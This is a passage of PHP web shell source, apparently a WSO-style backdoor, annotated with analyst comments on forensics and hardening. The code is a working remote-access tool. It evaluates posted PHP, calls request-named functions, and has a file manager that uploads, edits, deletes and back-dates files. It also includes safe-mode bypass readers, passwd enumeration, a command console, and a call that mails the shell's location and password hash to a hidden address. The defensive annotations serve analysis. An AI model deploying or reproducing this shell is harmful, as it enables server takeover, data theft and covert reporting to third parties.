  471. $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  472. echo strlen($temp), "\n", $temp;
  473. exit;
  474. }
  475. printHeader();
  476. if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
  477. echo '<h1>PHP info</h1><div class=content>';
  478. ob_start();
  479. phpinfo();
  480. $tmp = ob_get_clean();
  481. $tmp = preg_replace('!body {.*}!msiU','',$tmp);
  482. $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
  483. $tmp = preg_replace('!h1!msiU','h2',$tmp);
  484. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
  485. $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
  486. echo $tmp;
  487. echo '</div><br>';
  488. }
  489. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  490. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  491. echo '<h1>Execution PHP-code</h1> example : echo file_get_contents(`/etc/passwd`); <div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
  492. echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
  // Non-AJAX variant: run the posted code inline and print its escaped output.
  493. if(!empty($_POST['p1'])) {
  494. ob_start();
  495. eval($_POST['p1']);
  496. echo htmlspecialchars(ob_get_clean());
  497. }
  498. echo '</pre></div>';
  499. printFooter();
  500. }
  501.  
  /**
   * "Files" page: perform one file operation named by $_POST['p1'], then list the
   * current directory.
   *
   * Operations: uploadFile (store the uploaded part "f" under its client-supplied
   * name, relative to the current directory), mkdir, delete (recursive for
   * directories), copy/move (remember the selection in the session) and paste (apply
   * the remembered copy or move into the current directory). All paths come from
   * request fields or from the session values stored by an earlier request.
   * After that the directory is read with scandir(), each entry is annotated with
   * owner, group, mtime, size and coloured permissions, and the table is printed,
   * ordered by a p1 value of the form s_<field>_<0|1>.
   *
   * Forensics: expect new, deleted or renamed files owned by the web-server account
   * under whichever directory the 'c' field pointed at; multipart POSTs with
   * p1=uploadFile mark the upload requests.
   */
  502. function actionFilesMan() {
  503. printHeader();
  504. echo '<h1>File manager</h1><div class=content>';
  505. if(isset($_POST['p1'])) {
  506. switch($_POST['p1']) {
  // Upload: the destination is the file name sent by the client, taken as-is.
  507. case 'uploadFile':
  508. if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
  509. echo "Can't upload file!";
  510. break;
  511. break;
  512. case 'mkdir':
  513. if(!@mkdir($_POST['p2']))
  514. echo "Can't create new dir";
  515. break;
  // Delete: every posted "f[]" entry is URL-decoded; directories are removed
  // recursively by deleteDir(), files by unlink().
  516. case 'delete':
  517. function deleteDir($path) {
  518. $path = (substr($path,-1)=='/') ? $path:$path.'/';
  519. $dh = opendir($path);
  520. while ( ($item = readdir($dh) ) !== false) {
  521. $item = $path.$item;
  522. if ( (basename($item) == "..") || (basename($item) == ".") )
  523. continue;
  524. $type = filetype($item);
  525. if ($type == "dir")
  526. deleteDir($item);
  527. else
  528. @unlink($item);
  529. }
  530. closedir($dh);
  531. rmdir($path);
  532. }
  533. if(is_array(@$_POST['f']))
  534. foreach($_POST['f'] as $f) {
  535. $f = urldecode($f);
  536. if(is_dir($f))
  537. deleteDir($f);
  538. else
  539. @unlink($f);
  540. }
  541. break;
  // Paste: replays the selection stored in $_SESSION by an earlier copy/move request.
  // Copy recurses through copy_paste(); move declares move_paste() but the loop below
  // it calls rename() directly.
  542. case 'paste':
  543. if($_SESSION['act'] == 'copy') {
  544. function copy_paste($c,$s,$d){
  545. if(is_dir($c.$s)){
  546. mkdir($d.$s);
  547. $h = opendir($c.$s);
  548. while (($f = readdir($h)) !== false)
  549. if (($f != ".") and ($f != "..")) {
  550. copy_paste($c.$s.'/',$f, $d.$s.'/');
  551. }
  552. } elseif(is_file($c.$s)) {
  553. @copy($c.$s, $d.$s);
  554. }
  555. }
  556. foreach($_SESSION['f'] as $f)
  557. copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
  558. } elseif($_SESSION['act'] == 'move') {
  559. function move_paste($c,$s,$d){
  560. if(is_dir($c.$s)){
  561. mkdir($d.$s);
  562. $h = opendir($c.$s);
  563. while (($f = readdir($h)) !== false)
  564. if (($f != ".") and ($f != "..")) {
  565. copy_paste($c.$s.'/',$f, $d.$s.'/');
  566. }
  567. } elseif(is_file($c.$s)) {
  568. @copy($c.$s, $d.$s);
  569. }
  570. }
  571. foreach($_SESSION['f'] as $f)
  572. @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
  573. }
  574. unset($_SESSION['f']);
  575. break;
  // Copy / move: only records the action, the URL-decoded selection and the source
  // directory in the session; nothing on disk changes until a later "paste".
  576. default:
  577. if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
  578. $_SESSION['act'] = @$_POST['p1'];
  579. $_SESSION['f'] = @$_POST['f'];
  580. foreach($_SESSION['f'] as $k => $f)
  581. $_SESSION['f'][$k] = urldecode($f);
  582. $_SESSION['cwd'] = @$_POST['c'];
  583. }
  584. break;
  585. }
  586. echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
  587. }
  // Directory listing of the posted 'c' path, or of the current directory.
  588. $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
  589. if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
  // Sort key and direction: default name/ascending, overridden by p1 = s_<field>_<digit>.
  590. global $sort;
  591. $sort = array('name', 1);
  592. if(!empty($_POST['p1'])) {
  593. if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
  594. $sort = array($match[1], (int)$match[2]);
  595. }
  596. ?>
  597. <script>
  598. function sa() {
  599. for(i=0;i<document.files.elements.length;i++)
  600. if(document.files.elements[i].type == 'checkbox')
  601. document.files.elements[i].checked = document.files.elements[0].checked;
  602. }
  603. </script>
  604. <table width='100%' class='main' cellspacing='0' cellpadding='2'>
  605. <form name=files method=post>
  606. <?php
  607. echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
  // Collect metadata per entry and split the entries into files, links and
  // directories ("." is left out of the directory list).
  608. $dirs = $files = $links = array();
  609. $n = count($dirContent);
  610. for($i=0;$i<$n;$i++) {
  611. $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
  612. $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
  613. $tmp = array('name' => $dirContent[$i],
  614. 'path' => $GLOBALS['cwd'].$dirContent[$i],
  615. 'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
  616. 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
  617. 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
  618. 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
  619. 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
  620. );
  621. if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
  622. $files[] = array_merge($tmp, array('type' => 'file'));
  623. elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
  624. $links[] = array_merge($tmp, array('type' => 'link'));
  625. elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
  626. $dirs[] = array_merge($tmp, array('type' => 'dir'));
  627. }
  // Comparator used by usort(): string compare on the chosen field, numeric compare
  // for 'size', direction taken from $GLOBALS['sort'][1].
  628. $GLOBALS['sort'] = $sort;
  629. function cmp($a, $b) {
  630. if($GLOBALS['sort'][0] != 'size')
  631. return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
  632. else
  633. return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
  634. }
  635. usort($files, "cmp");
  636. usort($dirs, "cmp");
  637. usort($links, "cmp");
  638. $files = array_merge($dirs, $links, $files);
  // One table row per entry, with links to the FilesTools action (view, chmod, rename,
  // touch, edit, download); that handler is outside this excerpt.
  639. $l = 0;
  640. foreach($files as $f) {
  641. echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
  642. .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
  643. $l = $l?0:1;
  644. }
  645. ?>
  646. <tr><td colspan=7>
  647. <input type=hidden name=a value='FilesMan'>
  648. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
  649. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
  650. <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select>&nbsp;<input type="submit" value=">>"></td></tr>
  651. </form></table></div>
  652. <?php
  653. printFooter();
  654. }
  655.  
  656. function actionStringTools() {
        // Handler for the "String conversions" page of this web shell.
        // Security-relevant behaviour: the function named in POST 'p1' is called with POST 'p2'
        // as its only argument, in both the AJAX branch and the page branch below. The only
        // gate is function_exists(); the $stringTools list merely fills the <select> and is
        // not consulted as an allow-list.
  657.  
        // Helper converters defined on demand. The two "nested" helpers undo layered
        // base64 / ROT13 / gzinflate encoding of a string.
  658. if(!function_exists('ROT13_base64')) {function ROT13_base64_decode($p) {return (trim(gzinflate(str_rot13(base64_decode($p)))));}}
  659. if(!function_exists('base64_ROT13')) {function base64_ROT13_decode($p) {return (trim(gzinflate(base64_decode(str_rot13($p)))));}}
  660. if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
  661. if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
  662. if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
  663. if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
  664.  
        // AJAX mode: remember the choice in the session, run the requested function with
        // output buffering, and answer with a JavaScript snippet (preceded by its length)
        // that writes the HTML-escaped result into the element with id 'strOutput'.
  665. if(isset($_POST['ajax'])) {
  666. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  667. ob_start();
        // Request-controlled function name, request-controlled argument.
  668. if(function_exists($_POST['p1']))
  669. echo $_POST['p1']($_POST['p2']);
  670. $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  671. echo strlen($temp), "\n", $temp;
  672. exit;
  673. }
  674. printHeader();
  675. echo '<h1>String conversions</h1><div class=content>';
        // Label => function name pairs offered in the drop-down (display only).
  676. $stringTools = array(
  677. 'nested ROT13_base64' => 'ROT13_base64_decode',
  678. 'nested base64_ROT13' => 'base64_ROT13_decode',
  679. 'Base64 encode' => 'base64_encode',
  680. 'Base64 decode' => 'base64_decode',
  681. 'Url encode' => 'urlencode',
  682. 'Url decode' => 'urldecode',
  683. 'Full urlencode' => 'full_urlencode',
  684. 'md5 hash' => 'md5',
  685. 'sha1 hash' => 'sha1',
  686. 'crypt' => 'crypt',
  687. 'CRC32' => 'crc32',
  688. 'ASCII to HEX' => 'ascii2hex',
  689. 'HEX to ASCII' => 'hex2ascii',
  690. 'HEX to DEC' => 'hexdec',
  691. 'HEX to BIN' => 'hex2bin',
  692. 'DEC to HEX' => 'dechex',
  693. 'DEC to BIN' => 'decbin',
  694. 'BIN to HEX' => 'bin2hex',
  695. 'BIN to DEC' => 'bindec',
  696. 'String to lower case' => 'strtolower',
  697. 'String to upper case' => 'strtoupper',
  698. 'Htmlspecialchars' => 'htmlspecialchars',
  699. 'String length' => 'strlen',
  700. );
  701. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  702. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  703. echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
  704. foreach($stringTools as $k => $v)
  705. echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
  706. echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
        // Non-AJAX path: same dynamic call, result HTML-escaped into the <pre>.
  707. if(!empty($_POST['p1'])) {
  708. if(function_exists($_POST['p1']))
  709. echo htmlspecialchars($_POST['p1']($_POST['p2']));
  710. }
  711. echo"</pre></div>";
        // The static HTML that follows is browser-side only: a form that sends the typed hash
        // to a third-party lookup site and an iframe pointing at another one. These requests
        // are made by whoever views this page, not by the compromised server.
  712. ?>
  713. <br><h1>Search for hash:</h1><div class=content>
  714. <form method='get' target='_blank' name="hf">
  715. <input type="text" name="action" style="width:200px;"><br>
  716. <input type="button" value="HashCracker.de" onClick="document.hf.action='http://www.hashchecker.de/hash.cgi?';document.hf.submit()"><br>
  717. <!--<input type="button" value="hashcrack.com" onClick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()"><br>
  718. <input type="button" value="hashcracking.info" onClick="document.hf.action='https://hashcracking.info/index.php';document.hf.submit()"><br>
  719. <input type="button" value="md5.rednoize.com" onClick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
  720. <input type="button" value="md5decrypter.com" onClick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()"><br> -->
  721. </form>
  722. </div>
  723.  
  724. <iframe src="http://www.md5decrypter.co.uk/" frameborder="0" height="50%" width="100%"></iframe><br>
  725.  
  726. <?php
  727. printFooter();
  728.  
  729.  
  730. }
  731.  
  732. function actionFilesTools() {
        // File-tool handler of this web shell. The target path comes from POST 'p1'
        // (URL-decoded below), the operation from POST 'p2' and its argument from POST 'p3'.
        // No path restriction is applied in this function, so the reach is whatever the
        // account running PHP can read or write.
        // For incident response: the 'edit', 'chmod', 'rename' and 'touch' branches change
        // file content and metadata, so any file reachable by that account should be checked
        // against a known-good copy rather than trusted by its timestamps or permissions.
  733. if( isset($_POST['p1']) )
  734. $_POST['p1'] = urldecode($_POST['p1']);
        // 'download': stream the file as an attachment through the gzip output handler, then
        // exit. The directory branch is empty.
  735. if(@$_POST['p2']=='download') {
  736. if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
  737. ob_start("ob_gzhandler", 4096);
  738. header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
  739. if (function_exists("mime_content_type")) {
  740. $type = @mime_content_type($_POST['p1']);
  741. header("Content-Type: ".$type);
  742. }
  743. $fp = @fopen($_POST['p1'], "r");
  744. if($fp) {
  745. while(!@feof($fp))
  746. echo @fread($fp, 1024);
  747.  
  748. fclose($fp);
  749. }
  750. } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
  751.  
  752. }
  753. exit;
  754. }
        // 'mkfile': create an empty file if the path does not exist yet, then continue as 'edit'.
  755. if( @$_POST['p2'] == 'mkfile' ) {
  756. if(!file_exists($_POST['p1'])) {
  757. $fp = @fopen($_POST['p1'], 'w');
  758. if($fp) {
  759. $_POST['p2'] = "edit";
  760. fclose($fp);
  761. }
  762. }
  763. }
  764. printHeader();
  765. echo '<h1>File tools</h1><div class=content>';
  766. if( !file_exists(@$_POST['p1']) ) {
  767. echo 'File not exists';
  768. printFooter();
  769. return;
  770. }
        // Metadata banner. Both lookups below are fed fileowner(). The value labelled
        // "Create time" is filectime(), which on Unix is the inode change time.
  771. $uid = @posix_getpwuid(@fileowner($_POST['p1']));
  772. $gid = @posix_getgrgid(@fileowner($_POST['p1']));
  773. echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
  774. echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
  775. if( empty($_POST['p2']) )
  776. $_POST['p2'] = 'view';
        // Menu of operations: the full set for regular files, metadata-only otherwise.
  777. if( is_file($_POST['p1']) )
  778. $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
  779. else
  780. $m = array('Chmod', 'Rename', 'Touch');
  781. foreach($m as $v)
  782. echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
  783. echo '<br><br>';
  784. switch($_POST['p2']) {
        // 'view': print the file HTML-escaped, read in 1024-byte chunks.
  785. case 'view':
  786. echo '<pre class=ml1>';
  787. $fp = @fopen($_POST['p1'], 'r');
  788. if($fp) {
  789. while( !@feof($fp) )
  790. echo htmlspecialchars(@fread($fp, 1024));
  791. @fclose($fp);
  792. }
  793. echo '</pre>';
  794. break;
        // 'highlight': PHP syntax highlighting of the file, with <span> rewritten to <font>.
  795. case 'highlight':
  796. if( is_readable($_POST['p1']) ) {
  797. echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
  798. $code = highlight_file($_POST['p1'],true);
  799. echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
  800. }
  801. break;
        // 'chmod': POST 'p3' is read digit by digit as an octal number and applied.
  802. case 'chmod':
  803. if( !empty($_POST['p3']) ) {
  804. $perms = 0;
  805. for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
  806. $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
  807. if(!@chmod($_POST['p1'], $perms))
  808. echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
  809. else
  810. die('<script>g(null,null,null,null,"")</script>');
  811. }
  812. echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
  813. break;
        // 'edit': overwrite the file with POST 'p3' (no backup is taken), then show an editor.
  814. case 'edit':
  815. if( !is_writable($_POST['p1'])) {
  816. echo 'File isn\'t writeable';
  817. break;
  818. }
  819. if( !empty($_POST['p3']) ) {
  820. @file_put_contents($_POST['p1'],$_POST['p3']);
  821. echo 'Saved!<br><script>document.mf.p3.value="";</script>';
  822. }
  823. echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
  824. $fp = @fopen($_POST['p1'], 'r');
  825. if($fp) {
  826. while( !@feof($fp) )
  827. echo htmlspecialchars(@fread($fp, 1024));
  828. @fclose($fp);
  829. }
  830. echo '</textarea><input type=submit value=">>"></form>';
  831. break;
        // 'hexdump': offset / hex / text columns, 32 bytes per row; the whole file is loaded
        // into memory first.
  832. case 'hexdump':
  833. $c = @file_get_contents($_POST['p1']);
  834. $n = 0;
  835. $h = array('00000000<br>','','');
  836. $len = strlen($c);
  837. for ($i=0; $i<$len; ++$i) {
  838. $h[1] .= sprintf('%02X',ord($c[$i])).' ';
  839. switch ( ord($c[$i]) ) {
  840. case 0: $h[2] .= ' '; break;
  841. case 9: $h[2] .= ' '; break;
  842. case 10: $h[2] .= ' '; break;
  843. case 13: $h[2] .= ' '; break;
  844. default: $h[2] .= $c[$i]; break;
  845. }
  846. $n++;
  847. if ($n == 32) {
  848. $n = 0;
  849. if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
  850. $h[1] .= '<br>';
  851. $h[2] .= "\n";
  852. }
  853. }
  854. echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
  855. break;
        // 'rename': move the path in 'p1' to the path in 'p3'.
  856. case 'rename':
  857. if( !empty($_POST['p3']) ) {
  858. if(!@rename($_POST['p1'], $_POST['p3']))
  859. echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
  860. else
  861. die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
  862. }
  863. echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
  864. break;
        // 'touch': set both modification and access time to the parsed value of 'p3'.
        // Forensic consequence: mtime/atime on a host where this shell ran can be back-dated,
        // so timeline work should lean on the inode change time and on external logs.
  865. case 'touch':
  866. if( !empty($_POST['p3']) ) {
  867. $time = strtotime($_POST['p3']);
  868. if($time) {
  869. if(@touch($_POST['p1'],$time,$time))
  870. die('<script>g(null,null,null,null,"")</script>');
  871. else {
  872. echo 'Fail!<script>document.mf.p3.value="";</script>';
  873. }
  874. } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
  875. }
  876. echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
  877. break;
  878. case 'mkfile':
  879.  
  880. break;
  881. }
  882. echo '</div>';
  883. printFooter();
  884. }
  885.  
  886. function actionSafeMode() {
        // "Safe mode bypass" page: six alternative ways of reading files, listing
        // directories or enumerating accounts, selected by POST 'p1' (1-6) with the target in
        // POST 'p2' (and 'p3' for case 5). Each one goes through a different PHP API
        // (stream wrapper, glob, curl, include, posix, imap).
        // Hardening note: safe_mode was removed from PHP in 5.4, so these branches matter
        // mainly on legacy installations; which of the extensions used here are loaded and
        // what disable_functions contains decides which branches can run at all.
  887. $temp='';
  888. ob_start();
  889. switch($_POST['p1']) {
        // 1: copy the target through the compress.zlib:// wrapper into a temp file and print
        //    it. $test is not assigned anywhere in this function.
  890. case 1:
  891. $temp=@tempnam($test, 'cx');
  892. if(@copy("compress.zlib://".$_POST['p2'], $temp)){
  893. echo @file_get_contents($temp);
  894. unlink($temp);
  895. } else
  896. echo 'Sorry... Can\'t open file';
  897. break;
        // 2: list paths matching the given prefix via glob().
  898. case 2:
  899. $files = glob($_POST['p2'].'*');
  900. if( is_array($files) )
  901. foreach ($files as $filename)
  902. echo $filename."\n";
  903. break;
        // 3: fetch a file:// URL with curl; a NUL byte and the shell's own path are appended
        //    to the URL (presumably aimed at a path check in old curl builds - TODO confirm).
  904. case 3:
  905. $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
  906. curl_exec($ch);
  907. break;
        // 4: reset safe_mode/open_basedir with ini_restore(), then include() the target.
        //    include() also executes any PHP code the target contains.
  908. case 4:
  909. ini_restore("safe_mode");
  910. ini_restore("open_basedir");
  911. include($_POST['p2']);
  912. break;
        // 5: walk the numeric uid range p2..p3 and print each passwd entry found.
  913. case 5:
  914. for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
  915. $uid = @posix_getpwuid($_POST['p2']);
  916. if ($uid)
  917. echo join(':',$uid)."\n";
  918. }
  919. break;
        // 6: open the target as an IMAP mailbox and print the body of message 1.
  920. case 6:
  921. if(!function_exists('imap_open'))break;
  922. $stream = imap_open($_POST['p2'], "", "");
  923. if ($stream == FALSE)
  924. break;
  925. echo imap_body($stream, 1);
  926. imap_close($stream);
  927. break;
  928. }
        // Everything echoed above was buffered; it is printed further down inside a <pre>
        // without HTML escaping.
  929. $temp = ob_get_clean();
  930. printHeader();
  931. echo '<h1>Safe mode bypass</h1><div class=content>';
  932. echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
  933. if($temp)
  934. echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
  935. echo '</div>';
  936. printFooter();
  937. }
  // Top-level statement placed between two function definitions, so it runs whenever
  // execution of the file reaches this line, independently of the requested action.
  // If the session has no 'login' entry it calls system32() (defined later in this file),
  // which mails the shell's URL, the host's uname string, the password hash and the
  // visitor's IP to a hard-coded, base64-encoded address and then sets the 'login' entry.
  // In other words the shell reports its own location to a third party on first use; a host
  // where this file ran should be treated as known to that party as well.
  // `login` is written as a bare constant rather than a quoted string key.
  938. if (!$_SESSION[login]) system32($_SERVER['HTTP_HOST'],$_SERVER['REQUEST_URI'],$auth_pass);
  939. function actionConsole() {
        // Console page of the web shell. The string in POST 'p1' is handed to ex(), which is
        // defined outside this view (presumably it runs the string as an OS command - confirm
        // against its definition). Commands therefore arrive as ordinary POST bodies to this
        // one script, and any resulting processes are children of the web server / PHP worker.
  940. if(isset($_POST['ajax'])) {
        // AJAX mode: reply with JavaScript that appends the command and its output to the
        // output textarea. The text is converted from the POSTed charset to UTF-8 and
        // escaped for a single-quoted JS string.
  941. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  942. ob_start();
  943. echo "document.cf.cmd.value='';\n";
  944. $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
        // A trailing "cd <dir>" is mirrored with chdir() so the working directory kept in
        // the page's hidden form field follows the command. The new path is written into
        // the JavaScript without escaping.
  945. if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
  946. if(@chdir($match[1])) {
  947. $GLOBALS['cwd'] = @getcwd();
  948. echo "document.mf.c.value='".$GLOBALS['cwd']."';";
  949. }
  950. }
  951. echo "document.cf.output.value+='".$temp."';";
  952. echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
  953. $temp = ob_get_clean();
  954. echo strlen($temp), "\n", $temp;
  955. exit;
  956. }
  957. printHeader();
        // The inline script below keeps a client-side command history (arrow up / down).
  958. ?>
  959. <script>
  960. if(window.Event) window.captureEvents(Event.KEYDOWN);
  961. var cmds = new Array("");
  962. var cur = 0;
  963. function kp(e) {
  964. var n = (window.Event) ? e.which : e.keyCode;
  965. if(n == 38) {
  966. cur--;
  967. if(cur>=0)
  968. document.cf.cmd.value = cmds[cur];
  969. else
  970. cur++;
  971. } else if(n == 40) {
  972. cur++;
  973. if(cur < cmds.length)
  974. document.cf.cmd.value = cmds[cur];
  975. else
  976. cur--;
  977. }
  978. }
  979. function add(cmd) {
  980. cmds.pop();
